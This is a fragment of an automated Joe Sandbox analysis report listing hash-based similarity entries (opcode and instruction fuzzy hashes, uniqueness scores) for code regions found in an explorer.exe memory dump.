                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 92c0d9c28f7b14cf48f0e7bc275c44090f6c1faebb4c9eff1c20231799670893
                                                                                                                                                      • Instruction ID: ec535fa0ba9542556b28bd514037fa0008e012d27c1fb435bf8132ca4b54d386
                                                                                                                                                      • Opcode Fuzzy Hash: 92c0d9c28f7b14cf48f0e7bc275c44090f6c1faebb4c9eff1c20231799670893
                                                                                                                                                      • Instruction Fuzzy Hash: D9815D3570CB498BDB28EF58E88566AB7E2FBD4701F05462ED44EC3265DF74E8018B86
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9872f95907a3fff3bb2dc15ad370fe03462685fd16831ec47ef12214c055560d
                                                                                                                                                      • Instruction ID: 0f330cddfb1a881cdb23ae29a47e693850c6db2846b2fe9b88ea2db4a4e3ae56
                                                                                                                                                      • Opcode Fuzzy Hash: 9872f95907a3fff3bb2dc15ad370fe03462685fd16831ec47ef12214c055560d
                                                                                                                                                      • Instruction Fuzzy Hash: E8815370318B49CFDB54EF69D898AAA77E1FBA8301B10496DE55BC3254DF34E841CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 66179212810935a8c24ca55900a10875e2e60a99fd685c80c6d3f40906bda9a8
                                                                                                                                                      • Instruction ID: 2f9f1f8da61d2cb5b008038b12f20698ee0206f42bb249587b3f4727cb27930c
                                                                                                                                                      • Opcode Fuzzy Hash: 66179212810935a8c24ca55900a10875e2e60a99fd685c80c6d3f40906bda9a8
                                                                                                                                                      • Instruction Fuzzy Hash: F871C431718F098FEB54EF6C98996A6B3D5FB98314B45826DD88BC3252EE34E805C7C1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 20d07e163d5561e6cb2de8386772746ac9d79f432579530db84dc555c3bfe41a
                                                                                                                                                      • Instruction ID: 918f8f4ef35c8d4e3427bcdfe33c923d2c2f94f5c6bdb09e46fbaf3f03149fbc
                                                                                                                                                      • Opcode Fuzzy Hash: 20d07e163d5561e6cb2de8386772746ac9d79f432579530db84dc555c3bfe41a
                                                                                                                                                      • Instruction Fuzzy Hash: 2F717031714A088FEB68EF2CD49576533D1FB58344B0482AADC4ACB35AEA34FC52CB85
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 63e28886487f74e342c32be38909b8fe1cb0233e2626cf88d521a93613bc1520
                                                                                                                                                      • Instruction ID: f6c4364d05e9da52afaddd4af5d70a6261accb45e942f7307a603e5edda7df9b
                                                                                                                                                      • Opcode Fuzzy Hash: 63e28886487f74e342c32be38909b8fe1cb0233e2626cf88d521a93613bc1520
                                                                                                                                                      • Instruction Fuzzy Hash: 8E719230719B088FE754EF5DD84966AB7E5FB98711F10862EE54AC3210DB74E842CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 83b4e4303a3a045f9e01f9880aa6fe171011acb70a9d52f974b2da6cf2d59583
                                                                                                                                                      • Instruction ID: 47aed25d43f52fd5afe8675ef615ec2f136a66f41c049e5a8f68b37a2a79350b
                                                                                                                                                      • Opcode Fuzzy Hash: 83b4e4303a3a045f9e01f9880aa6fe171011acb70a9d52f974b2da6cf2d59583
                                                                                                                                                      • Instruction Fuzzy Hash: 9761F135B1CA489BDB28AF2898652BE73D5FB95350F15452DE8DBC3245EE20FC4287C2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3356406503-0
                                                                                                                                                      • Opcode ID: 3a44364c1016a49f04a174e3afe068aeab8b5f2945e2751d4b9c629dff2ad2c2
                                                                                                                                                      • Instruction ID: 6829748b9d005c45c5581f1668ae77d3801a6e0e0842bb43934576986ae74f29
                                                                                                                                                      • Opcode Fuzzy Hash: 3a44364c1016a49f04a174e3afe068aeab8b5f2945e2751d4b9c629dff2ad2c2
                                                                                                                                                      • Instruction Fuzzy Hash: A6715F30718A06CFEB64EF68D884BAAB7E5FB98311F40852ED44AC7255DF34E941CB52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7ce160d619847d54f4be3adc656e223daaab6dc6a76314402b8f61af63e542f7
                                                                                                                                                      • Instruction ID: 0486b653208b434861d41251786e9def636a5d581443df36b515f56ee9f1c749
                                                                                                                                                      • Opcode Fuzzy Hash: 7ce160d619847d54f4be3adc656e223daaab6dc6a76314402b8f61af63e542f7
                                                                                                                                                      • Instruction Fuzzy Hash: F7619A31708A488FDF64EF689C9856D77E2FBA9301B55452DE48BC3260DF34D846C781
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 56514dbe61aac1fa13fd9da6dcc3f65dbb396996e43bc20d70b628ec65a670a2
                                                                                                                                                      • Instruction ID: e54e8891c1e62e7d79be55e15dbc86686ae19d378154aef3dcc54baf7255e0f3
                                                                                                                                                      • Opcode Fuzzy Hash: 56514dbe61aac1fa13fd9da6dcc3f65dbb396996e43bc20d70b628ec65a670a2
                                                                                                                                                      • Instruction Fuzzy Hash: 10517531718E098FAB68EB2D9C9967973D6E7EC711714812ED44BC3265DE38E8078781
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 36f556d1b6bda4cf9978c5a6a125f21c466a14fffa3b6bd7b7cefd5bf313fa60
                                                                                                                                                      • Instruction ID: b46581695ec749ff8ef0e226d9e98113348647a47227e7c1e0ac055673206bfa
                                                                                                                                                      • Opcode Fuzzy Hash: 36f556d1b6bda4cf9978c5a6a125f21c466a14fffa3b6bd7b7cefd5bf313fa60
                                                                                                                                                      • Instruction Fuzzy Hash: BF3140347547068BEB44EF38D89866677E2FBD8341B04C93DD945C3264DE75E8458B81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a9c2d71df9ba96d9697ca19b724d09e34a4cb7770348c426de2a33892a8029ec
                                                                                                                                                      • Instruction ID: 95f022efb65d7fd685dea1093f42dbb4af5ecc96274613cef35aa95510b465b7
                                                                                                                                                      • Opcode Fuzzy Hash: a9c2d71df9ba96d9697ca19b724d09e34a4cb7770348c426de2a33892a8029ec
                                                                                                                                                      • Instruction Fuzzy Hash: 56413B1511DBC2AEC31ADA2D84401A9FFA1BFB6100B48879DD4C997F43C358E669C7E6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: dddd3ca5bb177d580940e9c3c5e54999e5dd2f8092cf2c07f884e3a752e35e77
                                                                                                                                                      • Instruction ID: ad6fc78e531d9db944f603454d827865fb7db568d68ceaea2e305341b69f5fcb
                                                                                                                                                      • Opcode Fuzzy Hash: dddd3ca5bb177d580940e9c3c5e54999e5dd2f8092cf2c07f884e3a752e35e77
                                                                                                                                                      • Instruction Fuzzy Hash: 61318E1111DBC7AED30ADA6D8040169FFA1FB77200B48879DD4D597B43C318E6A9C7E2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%